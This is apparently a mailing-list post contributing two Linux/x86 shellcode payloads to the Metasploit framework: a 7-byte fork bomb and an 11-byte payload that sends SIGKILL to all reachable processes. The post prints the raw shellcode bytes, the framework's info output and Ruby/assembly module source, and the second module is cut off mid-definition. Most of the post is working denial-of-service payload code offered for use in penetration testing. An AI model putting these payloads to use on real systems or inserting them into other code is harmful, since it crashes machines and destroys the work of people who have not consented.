Hey guys,

I just started playing around with Metasm earlier today (it's great!), and
drew up a couple of simple Linux/x86 payloads to test some of it out a bit.

I don't think these are really of interest for inclusion, but you're of course
welcome to them if they are.  I figure sending them can't hurt anything.

The first is a fork bomb in 7 bytes, and the other is kill(-1,9) in 11 bytes.
 These are some things I did when I first started playing with shellcode:

http://www.milw0rm.com/shellcode/2805
http://www.milw0rm.com/shellcode/3446

And as you can see they're the same:

$ ./msfpayload linux/x86/forkbomb y
# linux/x86/forkbomb - 7 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x02\x58\xcd\x80\xeb\xf9"

$ ./msfpayload linux/x86/killall y
# linux/x86/killall - 11 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80"

Quite cool.

msf > info linux/x86/forkbomb

       Name: Linux Fork Bomb (Metasm)
    Version: 1
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 40

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

  This payload launches a fork bomb, i.e. 'for (;;) fork()'

msf > info linux/x86/killall

       Name: Linux Kill All Processes (Metasm)
    Version: 1
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 44

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

  This payload sends SIGKILL to all of the processes we are permitted
  to send to via kill(-1, 9)

Thanks,
Kris Katterjohn

require 'msf/core'
require 'metasm'

module Metasploit3

        include Msf::Payload::Single
        include Msf::Payload::Linux

        def initialize(info = {})
                super(update_info(info,
                        'Name'        => 'Linux Fork Bomb (Metasm)',
                        'Version'     => '1',
                        'Description' => %q{
                                This payload launches a fork bomb,
                                i.e. 'for (;;) fork()'
                        },
                        'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
                        'License'     => MSF_LICENSE,
                        'Platform'    => 'linux',
                        'Arch'        => ARCH_X86,
                        'Payload'     =>
                                {
                                        'Offsets' => {},
                                        'Assembly' => <<EOA
; http://milw0rm.com/shellcode/2805

_start:
        push 2
        pop eax
        int 0x80
        jmp _start
EOA
                                }
                ))
        end
end

require 'msf/core'
require 'metasm'

module Metasploit3

        include Msf::Payload::Single
        include Msf::Payload::Linux

        def initialize(info = {})
                super(update_info(info,
                        'Name'        => 'Linux Kill All Processes (Metasm)',
                        'Version'     => '1',
                        'Description' => %q{
                                This payload sends SIGKILL to all of the
processes
                                we are permitted to send to via kill(-1, 9)
                        },
                        'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
                        'License'     => MSF_LICENSE,
                        'Platform'    => 'linux',
                        'Arch'        => ARCH_X86,
                        'Payload'     =>